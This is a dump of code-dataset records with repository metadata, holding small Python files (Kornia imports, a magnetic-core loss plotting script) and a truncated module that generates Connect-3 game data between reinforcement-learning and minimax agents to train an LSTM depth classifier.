| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
530e826259bbd062eb1c1abfe05d8820344b7d01
| 101
|
py
|
Python
|
kornia/geometry/warp/__init__.py
|
pmeier/kornia
|
57f5aeb605d0c69de88a0a1aa1563cee52d4bfaf
|
[
"ECL-2.0",
"Apache-2.0"
] | 10
|
2021-01-26T05:25:01.000Z
|
2022-02-08T06:10:41.000Z
|
kornia/geometry/warp/__init__.py
|
pmeier/kornia
|
57f5aeb605d0c69de88a0a1aa1563cee52d4bfaf
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2021-05-03T10:34:15.000Z
|
2022-02-17T04:25:26.000Z
|
kornia/geometry/warp/__init__.py
|
pmeier/kornia
|
57f5aeb605d0c69de88a0a1aa1563cee52d4bfaf
|
[
"ECL-2.0",
"Apache-2.0"
] | 4
|
2021-04-30T01:51:38.000Z
|
2022-01-27T05:06:04.000Z
|
from kornia.geometry.warp.homography_warper import *
from kornia.geometry.warp.depth_warper import *
| 33.666667
| 52
| 0.841584
| 14
| 101
| 5.928571
| 0.571429
| 0.240964
| 0.433735
| 0.53012
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.079208
| 101
| 2
| 53
| 50.5
| 0.892473
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
53195ebb4eb50b0707bba2cc88d96afb60e41d83
| 33
|
py
|
Python
|
tests/tests_unit/test_api/good_absolute_import/shared/util.py
|
AlexThunder/cognite-sdk-python-experimental
|
468d29e7809793ed45cef5da25dca22418839972
|
[
"Apache-2.0"
] | null | null | null |
tests/tests_unit/test_api/good_absolute_import/shared/util.py
|
AlexThunder/cognite-sdk-python-experimental
|
468d29e7809793ed45cef5da25dca22418839972
|
[
"Apache-2.0"
] | null | null | null |
tests/tests_unit/test_api/good_absolute_import/shared/util.py
|
AlexThunder/cognite-sdk-python-experimental
|
468d29e7809793ed45cef5da25dca22418839972
|
[
"Apache-2.0"
] | null | null | null |
def shared_func():
return 42
| 11
| 18
| 0.666667
| 5
| 33
| 4.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08
| 0.242424
| 33
| 2
| 19
| 16.5
| 0.76
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
7263e0a4e7a780153965a53eb89c8abaf125d29d
| 4,345
|
py
|
Python
|
plot_micrometals_pv_official.py
|
dword1511/powdercore-q
|
ddf24c50e8178033a30cfbbf94642a5199764da6
|
[
"Apache-2.0"
] | null | null | null |
plot_micrometals_pv_official.py
|
dword1511/powdercore-q
|
ddf24c50e8178033a30cfbbf94642a5199764da6
|
[
"Apache-2.0"
] | null | null | null |
plot_micrometals_pv_official.py
|
dword1511/powdercore-q
|
ddf24c50e8178033a30cfbbf94642a5199764da6
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
from pv_plotter import PvPlotter
import micrometals
if __name__ == '__main__':
plotter = PvPlotter()
f = {'MHz': [10, 5, 2, 1], 'kHz': [500, 200, 100, 50, 10, 1]}
colors = ['#a50021', '#cc0000', '#ff5050', '#ff9999', '#3366ff', '#0000cc', '#00cc66', '#006400', '#ff3399', '#cc0099']
styles = ['--' , '-' , ':' , '-.' , '--' , '-.' , '--' , '--' , ':' , '-' ]
bpk_range = [1 , 10000]
pv_range = [10, 10000]
log = {'b': True, 'p': True}
size = (3.5, 2)
units = {'l': 'cm', 'p': 'mW', 'b': 'G'}
material = micrometals.Mix_1()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
# As in datasheet. Commenting bpk_range and f out gives more informative graph
bpk_range = [10, 10000]
f = {'kHz': [500, 250, 100, 50, 25, 10, 5, 1], 'Hz': [400, 60]}
material = micrometals.Mix_2()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_3()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_4()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_6()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_7()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_8()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_10()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_14()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_15()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_17()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_18()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_19()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_26()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_30()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_34()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_35()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_38()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_40()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_45()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_52()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_60()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_61()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_63()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_65()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_66()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_70()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
material = micrometals.Mix_M125()
plotter.plot_one_mat(material, f, colors, styles, bpk_range, pv_range, log, size, units)
| 41.380952
| 124
| 0.688608
| 627
| 4,345
| 4.527911
| 0.148325
| 0.087355
| 0.143008
| 0.167665
| 0.84255
| 0.84255
| 0.84255
| 0.84255
| 0.84255
| 0.84255
| 0
| 0.043792
| 0.16962
| 4,345
| 104
| 125
| 41.778846
| 0.743071
| 0.022555
| 0
| 0.4
| 0
| 0
| 0.027091
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028571
| 0
| 0.028571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
728c01bad19303a74b6fa600231b7732020fd3cd
| 177
|
py
|
Python
|
utils/__init__.py
|
fringebits/AdventOfCode-2021
|
a54edb07a3585e30abf56efd57abe188861f1855
|
[
"MIT"
] | 1
|
2015-12-10T19:36:37.000Z
|
2015-12-10T19:36:37.000Z
|
utils/__init__.py
|
fringebits/AdventOfCode-2021
|
a54edb07a3585e30abf56efd57abe188861f1855
|
[
"MIT"
] | null | null | null |
utils/__init__.py
|
fringebits/AdventOfCode-2021
|
a54edb07a3585e30abf56efd57abe188861f1855
|
[
"MIT"
] | null | null | null |
from .helpers import bisect
from .helpers import xor
from .load import load_input
from .timer import timer
from .timer import Timer
from .vec2 import Vec2
from .vec3 import Vec3
| 25.285714
| 28
| 0.80791
| 29
| 177
| 4.896552
| 0.344828
| 0.15493
| 0.239437
| 0.28169
| 0.309859
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026667
| 0.152542
| 177
| 7
| 29
| 25.285714
| 0.92
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
72eb046fdf5b853db1bc2a945c7321f7ad12a0b9
| 59,155
|
py
|
Python
|
utils/learning_behaviour_utils.py
|
ColdFrenzy/Adaptive_Learning
|
02cdd519a7e224fe5f2a49b0c21baa3dac5ce0e1
|
[
"MIT"
] | null | null | null |
utils/learning_behaviour_utils.py
|
ColdFrenzy/Adaptive_Learning
|
02cdd519a7e224fe5f2a49b0c21baa3dac5ce0e1
|
[
"MIT"
] | null | null | null |
utils/learning_behaviour_utils.py
|
ColdFrenzy/Adaptive_Learning
|
02cdd519a7e224fe5f2a49b0c21baa3dac5ce0e1
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys
import os
import random
import numpy as np
import logging
import math
from policies.minimax_policy import minimax
from policies.minimax_connect3 import minimax_connect3
sys.path.insert(1, os.path.abspath(os.pardir))
from config.custom_config import Config
from config.connect4_config import Connect4Config,Connect3Config
from env.connect4_multiagent_env import Connect4Env
from utils.pre_compute_elo import board_print
player1 = Connect4Config.PLAYER1
player2 = Connect4Config.PLAYER2
player1_ID = Connect4Config.PLAYER1_ID
player2_ID = Connect4Config.PLAYER2_ID
from tensorflow import keras
from tensorflow.keras import layers
def LSTM_model(batch_size, input_shape,output_shape,lstm_hidden,show_summary):
model = keras.Sequential()
# model.add(keras.Input(input_shape,batch_size=batch_size))
# time major == True => [timestep,batch,features]
# time_major == False => [batch,timestep,features]
model.add(layers.LSTM(lstm_hidden,time_major=False))
# 3 classes (different depths)
model.add(layers.Dense(output_shape))
model.add(layers.Softmax())
model.compile(
optimizer=keras.optimizers.RMSprop(), # Optimizer
# Loss function to minimize
loss=keras.losses.CosineSimilarity(),
#loss=keras.losses.CategoricalCrossentropy(),
# List of metrics to monitor
metrics=[keras.metrics.CategoricalAccuracy()],
)
if show_summary:
model.summary()
return model
def model_vs_model_connect3_generate_data(model1,model2,weights, number_of_games,sequence_len,randomize=True,number_of_stochastic_moves=0,logger=None):
"""
generates game data from games with the board seen by model1 pov
"""
game = Connect4Env(None,width=Connect3Config.WIDTH,
height=Connect3Config.HEIGHT,
n_actions=Connect3Config.N_ACTIONS,
connect=Connect3Config.CONNECT,
)
dataset_no_clones = []
dataset = []
# game encoded as a string
games_list = []
number_of_equal_games = 0
# sequence of configuration encoded as a string
sequence_list = []
number_of_equal_sequences = 0
total_sequence_list = {}
total_games_list = {}
label = 0
# Tournament between agents with different weights
for w1_indx,w1 in enumerate(weights):
model1.base_model.set_weights(weights[w1])
if logger:
logger.info("STARTING WITH WEIGHTS: " + w1)
# before updating the label, we check if we have a new one, in that case
# we reset both
new_label = int(w1.split("_")[0][-1])
if new_label != label:
if label != 0:
total_games_list[label] = games_list
total_sequence_list[label] = sequence_list
games_list = []
sequence_list = []
label = int(w1.split("_")[0][-1])
for w2_indx,w2 in enumerate(weights):
# DELETE
# if w2_indx > 3:
# continue
# if w2_indx < w1_indx:
# continue
print("Starting weights " + str(w1) + " vs weights " + str(w2))
model2.base_model.set_weights(weights[w2])
for i in range(number_of_games):
# temp action and board state,
#action_total = []
board_plus_action_total = []
timestep = 0
game_over = False
actions = {}
encoded_game = []
if randomize:
starting_player = random.choice([player1_ID, player2_ID])
if starting_player == player1_ID:
encoded_game.append("p1_")
elif starting_player == player2_ID:
encoded_game.append("p2_")
else:
starting_player = player1_ID
encoded_game.append("p1_")
game.reset(starting_player=starting_player,randomize=False)
while not game_over:
timestep += 1
actual_player = game.current_player
board = game.board
board_p2 = game.board_p2
if actual_player == player1_ID:
input_dict = {"obs": {}}
action_mask = game.get_moves(True)
input_dict["obs"]["state"] = board
input_dict["obs"]["action_mask"] = action_mask
action_logits, _ = model1.forward(input_dict, None, None)
if timestep > number_of_stochastic_moves:
act = np.argmax(action_logits[0])
elif timestep <= number_of_stochastic_moves:
action_prob = [np.exp(single_log)/sum(np.exp(action_logits[0])) for single_log in action_logits[0]]
act = np.random.choice([0,1,2,3,4],1,p=action_prob)[0]
encoded_game.append(str(act))
flattened_board = np.ndarray.flatten(board)
board_plus_actions = np.append(flattened_board,float(act))
board_plus_action_total.append([board_plus_actions])
actions[player1] = act
_, rew, done, _ = game.step(actions)
elif actual_player == player2_ID:
input_dict = {"obs": {}}
action_mask = game.get_moves(True)
input_dict["obs"]["state"] = board_p2 #reshaped_board
input_dict["obs"]["action_mask"] = action_mask
action_logits, _ = model2.forward(input_dict, None, None)
if timestep > number_of_stochastic_moves:
act = np.argmax(action_logits[0])
elif timestep <= number_of_stochastic_moves:
action_prob = [np.exp(single_log)/sum(np.exp(action_logits[0])) for single_log in action_logits[0]]
act = np.random.choice([0,1,2,3,4],1,p=action_prob)[0]
encoded_game.append(str(act))
actions[player2] = act
_, rew, done, _ = game.step(actions)
else:
raise ValueError("Player index is not valid, should be 0 or 1")
if done["__all__"]:
game_over = True
game_str = ''.join(encoded_game)
# ADD ENCODED GAME TO THE LISt
if game_str in games_list:
number_of_equal_games += 1
elif game_str not in games_list:
games_list.append(game_str)
# if the game is too short, just discard it
if len(board_plus_action_total) < sequence_len:
continue
for j in range(len(board_plus_action_total)-(sequence_len-1)):
to_string=str(board_plus_action_total[j:j+sequence_len])
if to_string in sequence_list:
number_of_equal_sequences += 1
else:
sequence_list.append(to_string)
dataset_no_clones.append([])
dataset_no_clones[-1].append(board_plus_action_total[j:j+sequence_len])
dataset_no_clones[-1].append(label)
dataset.append([])
dataset[-1].append(board_plus_action_total[j:j+sequence_len])
dataset[-1].append(label)
total_games_list[label] = games_list
total_sequence_list[label] = sequence_list
print("The number of equal games is: " + str(number_of_equal_games))
print("The number of equal sequences is: " + str(number_of_equal_sequences))
return total_sequence_list, total_games_list, dataset,dataset_no_clones
def model_vs_model_connect3_generate_data_v2(model1,model2,weights, number_of_games,sequence_len,randomize=True,number_of_stochastic_moves=0,logger=None):
"""
generates game data from games with the board seen by model1 pov
"""
game = Connect4Env(None,width=Connect3Config.WIDTH,
height=Connect3Config.HEIGHT,
n_actions=Connect3Config.N_ACTIONS,
connect=Connect3Config.CONNECT,
)
dataset_no_clones = []
dataset = []
# game encoded as a string
games_list = []
number_of_equal_games = 0
lv1_skipped = 0
lv4_skipped = 0
lv6_skipped = 0
# sequence of configuration encoded as a string
sequence_list = []
number_of_equal_sequences = 0
# Tournament between agents with different weights
for w1_indx,w1 in enumerate(weights):
model1.base_model.set_weights(weights[w1])
if logger:
logger.info("STARTING WITH WEIGHTS: " + w1)
# DELETE
# if w1_indx > 2:
# break
label = int(w1.split("_")[0][-1])
for w2_indx,w2 in enumerate(weights):
# DELETE
# if w2_indx > 3:
# continue
# if w2_indx < w1_indx:
# continue
print("Starting weights " + str(w1) + " vs weights " + str(w2))
model2.base_model.set_weights(weights[w2])
for i in range(number_of_games):
# temp action and board state,
#action_total = []
board_plus_action_total = []
timestep = 0
game_over = False
actions = {}
encoded_game = []
if randomize:
starting_player = random.choice([player1_ID, player2_ID])
if starting_player == player1_ID:
encoded_game.append("p1_")
elif starting_player == player2_ID:
encoded_game.append("p2_")
else:
starting_player = player1_ID
encoded_game.append("p1_")
game.reset(starting_player=starting_player,randomize=False)
while not game_over:
timestep += 1
actual_player = game.current_player
board = game.board
board_p2 = game.board_p2
if actual_player == player1_ID:
input_dict = {"obs": {}}
action_mask = game.get_moves(True)
input_dict["obs"]["state"] = board
input_dict["obs"]["action_mask"] = action_mask
action_logits, _ = model1.forward(input_dict, None, None)
if timestep > number_of_stochastic_moves:
act = np.argmax(action_logits[0])
elif timestep <= number_of_stochastic_moves:
action_prob = [np.exp(single_log)/sum(np.exp(action_logits[0])) for single_log in action_logits[0]]
act = np.random.choice([0,1,2,3,4],1,p=action_prob)[0]
encoded_game.append(str(act))
flattened_board = np.ndarray.flatten(board)
board_plus_actions = np.append(flattened_board,float(act))
board_plus_action_total.append([board_plus_actions])
actions[player1] = act
_, rew, done, _ = game.step(actions)
elif actual_player == player2_ID:
input_dict = {"obs": {}}
action_mask = game.get_moves(True)
input_dict["obs"]["state"] = board_p2 #reshaped_board
input_dict["obs"]["action_mask"] = action_mask
action_logits, _ = model2.forward(input_dict, None, None)
if timestep > number_of_stochastic_moves:
act = np.argmax(action_logits[0])
elif timestep <= number_of_stochastic_moves:
action_prob = [np.exp(single_log)/sum(np.exp(action_logits[0])) for single_log in action_logits[0]]
act = np.random.choice([0,1,2,3,4],1,p=action_prob)[0]
encoded_game.append(str(act))
actions[player2] = act
_, rew, done, _ = game.step(actions)
else:
raise ValueError("Player index is not valid, should be 0 or 1")
if done["__all__"]:
game_over = True
game_str = ''.join(encoded_game)
# ADD ENCODED GAME TO THE LISt
if game_str in games_list:
number_of_equal_games += 1
elif game_str not in games_list:
games_list.append(game_str)
# if the game is too short, just discard it
if len(board_plus_action_total) < sequence_len:
continue
for j in range(len(board_plus_action_total)-(sequence_len-1)):
to_string=str(board_plus_action_total[j:j+sequence_len])
if to_string in sequence_list:
number_of_equal_sequences += 1
if label == 1:
lv1_skipped += 1
elif label == 4:
lv4_skipped += 1
elif label == 6:
lv6_skipped += 1
else:
sequence_list.append(to_string)
dataset_no_clones.append([])
dataset_no_clones[-1].append(board_plus_action_total[j:j+sequence_len])
dataset_no_clones[-1].append(label)
dataset.append([])
dataset[-1].append(board_plus_action_total[j:j+sequence_len])
dataset[-1].append(label)
print("The number of equal games is: " + str(number_of_equal_games))
print("The number of equal sequences is: " + str(number_of_equal_sequences))
print("depth 1 skipped: " + str(lv1_skipped))
print("depth 4 skipped: " + str(lv4_skipped))
print("depth 6 skipped: " + str(lv6_skipped))
return games_list, sequence_list, dataset,dataset_no_clones
def model_vs_model_connect3_generate_data_v3(model1,model2,weights, number_of_games,sequence_len,randomize=True,number_of_stochastic_moves=0,logger=None):
"""
In this version we also added the outcome of the game to the vector
of the sequence of moves
"""
game = Connect4Env(None,width=Connect3Config.WIDTH,
height=Connect3Config.HEIGHT,
n_actions=Connect3Config.N_ACTIONS,
connect=Connect3Config.CONNECT,
)
dataset_no_clones = []
dataset = []
# game encoded as a string
games_list = []
number_of_equal_games = 0
# sequence of configuration encoded as a string
sequence_list = []
number_of_equal_sequences = 0
total_sequence_list = {}
total_games_list = {}
label = 0
# Tournament between agents with different weights
for w1_indx,w1 in enumerate(weights):
model1.base_model.set_weights(weights[w1])
if logger:
logger.info("STARTING WITH WEIGHTS: " + w1)
# before updating the label, we check if we have a new one, in that case
# we reset both
new_label = int(w1.split("_")[0][-1])
if new_label != label:
if label != 0:
total_games_list[label] = games_list
total_sequence_list[label] = sequence_list
games_list = []
sequence_list = []
label = int(w1.split("_")[0][-1])
for w2_indx,w2 in enumerate(weights):
# DELETE
# if w2_indx > 3:
# continue
# if w2_indx < w1_indx:
# continue
print("Starting weights " + str(w1) + " vs weights " + str(w2))
model2.base_model.set_weights(weights[w2])
for i in range(number_of_games):
# temp action and board state,
#action_total = []
board_plus_action_total = []
timestep = 0
game_over = False
actions = {}
encoded_game = []
if randomize:
starting_player = random.choice([player1_ID, player2_ID])
if starting_player == player1_ID:
encoded_game.append("p1_")
elif starting_player == player2_ID:
encoded_game.append("p2_")
else:
starting_player = player1_ID
encoded_game.append("p1_")
game.reset(starting_player=starting_player,randomize=False)
while not game_over:
timestep += 1
actual_player = game.current_player
board = game.board
board_p2 = game.board_p2
if actual_player == player1_ID:
input_dict = {"obs": {}}
action_mask = game.get_moves(True)
input_dict["obs"]["state"] = board
input_dict["obs"]["action_mask"] = action_mask
action_logits, _ = model1.forward(input_dict, None, None)
if timestep > number_of_stochastic_moves:
act = np.argmax(action_logits[0])
elif timestep <= number_of_stochastic_moves:
action_prob = [np.exp(single_log)/sum(np.exp(action_logits[0])) for single_log in action_logits[0]]
act = np.random.choice([0,1,2,3,4],1,p=action_prob)[0]
encoded_game.append(str(act))
flattened_board = np.ndarray.flatten(board)
board_plus_actions = np.append(flattened_board,float(act))
board_plus_action_total.append([board_plus_actions])
actions[player1] = act
_, rew, done, _ = game.step(actions)
elif actual_player == player2_ID:
input_dict = {"obs": {}}
action_mask = game.get_moves(True)
input_dict["obs"]["state"] = board_p2 #reshaped_board
input_dict["obs"]["action_mask"] = action_mask
action_logits, _ = model2.forward(input_dict, None, None)
if timestep > number_of_stochastic_moves:
act = np.argmax(action_logits[0])
elif timestep <= number_of_stochastic_moves:
action_prob = [np.exp(single_log)/sum(np.exp(action_logits[0])) for single_log in action_logits[0]]
act = np.random.choice([0,1,2,3,4],1,p=action_prob)[0]
encoded_game.append(str(act))
actions[player2] = act
_, rew, done, _ = game.step(actions)
else:
raise ValueError("Player index is not valid, should be 0 or 1")
if done["__all__"]:
# we use 7,8,9 as value for the outcome in order to
# not confuse them with the values of actions
if rew["player1"] == 1:
encoded_game.append("_7")
outcome = 7.0
elif rew["player1"] == -1:
encoded_game.append("_8")
outcome = 8.0
elif rew["player1"] == 0:
encoded_game.append("_9")
outcome = 9.0
game_over = True
game_str = ''.join(encoded_game)
# ADD ENCODED GAME TO THE LISt
if game_str in games_list:
number_of_equal_games += 1
elif game_str not in games_list:
games_list.append(game_str)
# if the game is too short, just discard it
if len(board_plus_action_total) < sequence_len:
continue
board_plus_action_and_outcome = []
for elem in board_plus_action_total:
new_elem = np.append(elem,outcome)
board_plus_action_and_outcome.append([new_elem])
for j in range(len(board_plus_action_and_outcome)-(sequence_len-1)):
to_string=str(board_plus_action_and_outcome[j:j+sequence_len])
if to_string in sequence_list:
number_of_equal_sequences += 1
else:
sequence_list.append(to_string)
dataset_no_clones.append([])
dataset_no_clones[-1].append(board_plus_action_and_outcome[j:j+sequence_len])
dataset_no_clones[-1].append(label)
dataset.append([])
dataset[-1].append(board_plus_action_and_outcome[j:j+sequence_len])
dataset[-1].append(label)
total_games_list[label] = games_list
total_sequence_list[label] = sequence_list
print("The number of equal games is: " + str(number_of_equal_games))
print("The number of equal sequences is: " + str(number_of_equal_sequences))
return total_sequence_list, total_games_list, dataset,dataset_no_clones
def model_vs_model_connect3_generate_data_v4(model1,model2,use_outcome,weights, number_of_games,sequence_len,randomize=True,number_of_stochastic_moves=0,logger=None):
"""
In this version we also add the outcome of the game to the vector
"""
game = Connect4Env(None,width=Connect3Config.WIDTH,
height=Connect3Config.HEIGHT,
n_actions=Connect3Config.N_ACTIONS,
connect=Connect3Config.CONNECT,
)
dataset_no_clones = []
dataset = []
# game encoded as a string
games_list = []
number_of_equal_games = 0
# sequence of configuration encoded as a string
sequence_list = []
number_of_equal_sequences = 0
# index of data that are equals and we need to remove from dataset later
indx_to_remove = []
label = 0
sequences_per_player = {}
# Tournament between agents with different weights
for w1_indx,w1 in enumerate(weights):
model1.base_model.set_weights(weights[w1])
if logger:
logger.info("STARTING WITH WEIGHTS: " + w1)
label = int(w1.split("_")[0][-1])
if label not in sequences_per_player:
sequences_per_player[label] = []
for w2_indx,w2 in enumerate(weights):
print("Starting weights " + str(w1) + " vs weights " + str(w2))
model2.base_model.set_weights(weights[w2])
for i in range(number_of_games):
# temp action and board state,
#action_total = []
board_plus_action_total = []
timestep = 0
game_over = False
actions = {}
encoded_game = []
if randomize:
starting_player = random.choice([player1_ID, player2_ID])
if starting_player == player1_ID:
encoded_game.append("p1_")
elif starting_player == player2_ID:
encoded_game.append("p2_")
else:
starting_player = player1_ID
encoded_game.append("p1_")
game.reset(starting_player=starting_player,randomize=False)
while not game_over:
timestep += 1
actual_player = game.current_player
board = game.board
board_p2 = game.board_p2
if actual_player == player1_ID:
input_dict = {"obs": {}}
action_mask = game.get_moves(True)
input_dict["obs"]["state"] = board
input_dict["obs"]["action_mask"] = action_mask
action_logits, _ = model1.forward(input_dict, None, None)
if timestep > number_of_stochastic_moves:
act = np.argmax(action_logits[0])
elif timestep <= number_of_stochastic_moves:
action_prob = [np.exp(single_log)/sum(np.exp(action_logits[0])) for single_log in action_logits[0]]
act = np.random.choice([0,1,2,3,4],1,p=action_prob)[0]
encoded_game.append(str(act))
flattened_board = np.ndarray.flatten(board)
board_plus_actions = np.append(flattened_board,float(act))
board_plus_action_total.append([board_plus_actions])
actions[player1] = act
_, rew, done, _ = game.step(actions)
elif actual_player == player2_ID:
input_dict = {"obs": {}}
action_mask = game.get_moves(True)
input_dict["obs"]["state"] = board_p2 #reshaped_board
input_dict["obs"]["action_mask"] = action_mask
action_logits, _ = model2.forward(input_dict, None, None)
if timestep > number_of_stochastic_moves:
act = np.argmax(action_logits[0])
elif timestep <= number_of_stochastic_moves:
action_prob = [np.exp(single_log)/sum(np.exp(action_logits[0])) for single_log in action_logits[0]]
act = np.random.choice([0,1,2,3,4],1,p=action_prob)[0]
encoded_game.append(str(act))
actions[player2] = act
_, rew, done, _ = game.step(actions)
else:
raise ValueError("Player index is not valid, should be 0 or 1")
if done["__all__"]:
# we use 7,8,9 as value for the outcome in order to
# not confuse them with the values of actions
if use_outcome:
if rew["player1"] == 1:
encoded_game.append("_7")
outcome = 7.0
elif rew["player1"] == -1:
encoded_game.append("_8")
outcome = 8.0
elif rew["player1"] == 0:
encoded_game.append("_9")
outcome = 9.0
game_over = True
game_str = ''.join(encoded_game)
# ADD ENCODED GAME TO THE LISt
if game_str in games_list:
number_of_equal_games += 1
elif game_str not in games_list:
games_list.append(game_str)
# if the game is too short, just discard it
if len(board_plus_action_total) < sequence_len:
continue
if use_outcome:
board_plus_action_and_outcome = []
for elem in board_plus_action_total:
new_elem = np.append(elem,outcome)
board_plus_action_and_outcome.append([new_elem])
else:
board_plus_action_and_outcome = board_plus_action_total
for j in range(len(board_plus_action_and_outcome)-(sequence_len-1)):
to_string=str(board_plus_action_and_outcome[j:j+sequence_len])
if to_string in sequence_list:
indx = sequence_list.index(to_string)
number_of_equal_sequences += 1
if indx not in indx_to_remove:
indx_to_remove.append(indx)
else:
sequences_per_player[label].append(to_string)
sequence_list.append(to_string)
dataset_no_clones.append([])
dataset_no_clones[-1].append(board_plus_action_and_outcome[j:j+sequence_len])
dataset_no_clones[-1].append(label)
dataset.append([])
dataset[-1].append(board_plus_action_and_outcome[j:j+sequence_len])
dataset[-1].append(label)
final_dataset = []
for i,elem in enumerate(dataset_no_clones):
if i not in indx_to_remove:
final_dataset.append(elem)
count = 0
final_sequences = {}
for elem in sequences_per_player:
final_sequences[elem] = []
for indx,elem_2 in enumerate(sequences_per_player[elem]):
if count not in indx_to_remove:
final_sequences[elem].append(elem_2)
count += 1
print("Original dataset length " + str(len(dataset_no_clones)) + " without clones: " + str(len(final_dataset)))
print("The number of equal games is: " + str(number_of_equal_games))
print("The number of equal sequences is: " + str(number_of_equal_sequences))
return sequence_list, games_list, dataset,final_dataset,final_sequences
def split_train_val(loaded_data,depth_list,val_indx=0.15,shuffle = True):
"""
val_indx is the percentage of elements in the validation set
:params:
loaded_data: list
list of lists, where the first element are the encoded games
and the second is the label
"""
shuffled_dataset = [ [elem[0],elem[1]] for elem in loaded_data]
val_elems = int(len(shuffled_dataset)*val_indx)
train_elems = len(shuffled_dataset) - val_elems
unbalanced = True
# shuffle the dataset
if shuffle:
# while unbalanced:
np.random.shuffle(shuffled_dataset)
x_train = []
y_train = []
x_val = []
y_val = []
for i,elem in enumerate(shuffled_dataset):
one_hot_vec = [0] * len(depth_list)
if i < train_elems:
x_train.append(elem[0])
indx = depth_list.index(elem[1])
one_hot_vec[indx] = 1
y_train.append(one_hot_vec)
else:
x_val.append(elem[0])
indx = depth_list.index(elem[1])
one_hot_vec[indx] = 1
y_val.append(one_hot_vec)
return x_train,y_train,x_val,y_val
def minimax_vs_minimax_connect3_generate_data(depth_list,number_of_games,sequence_len,randomize= True,logger = None):
"""
simulates 'number_of_games' between all combinations of minimax depth
inside the depth list.
:params:
depth_list: list of int
minimax depths
number_of_games: int
"""
game = Connect4Env(None,width=Connect3Config.WIDTH,
height=Connect3Config.HEIGHT,
n_actions=Connect3Config.N_ACTIONS,
connect=Connect3Config.CONNECT,
)
dataset_no_clones = []
dataset = []
dataset_full_games = []
# game encoded as a string
games_list = []
number_of_equal_games = 0
# sequence of configuration encoded as a string
sequence_list = []
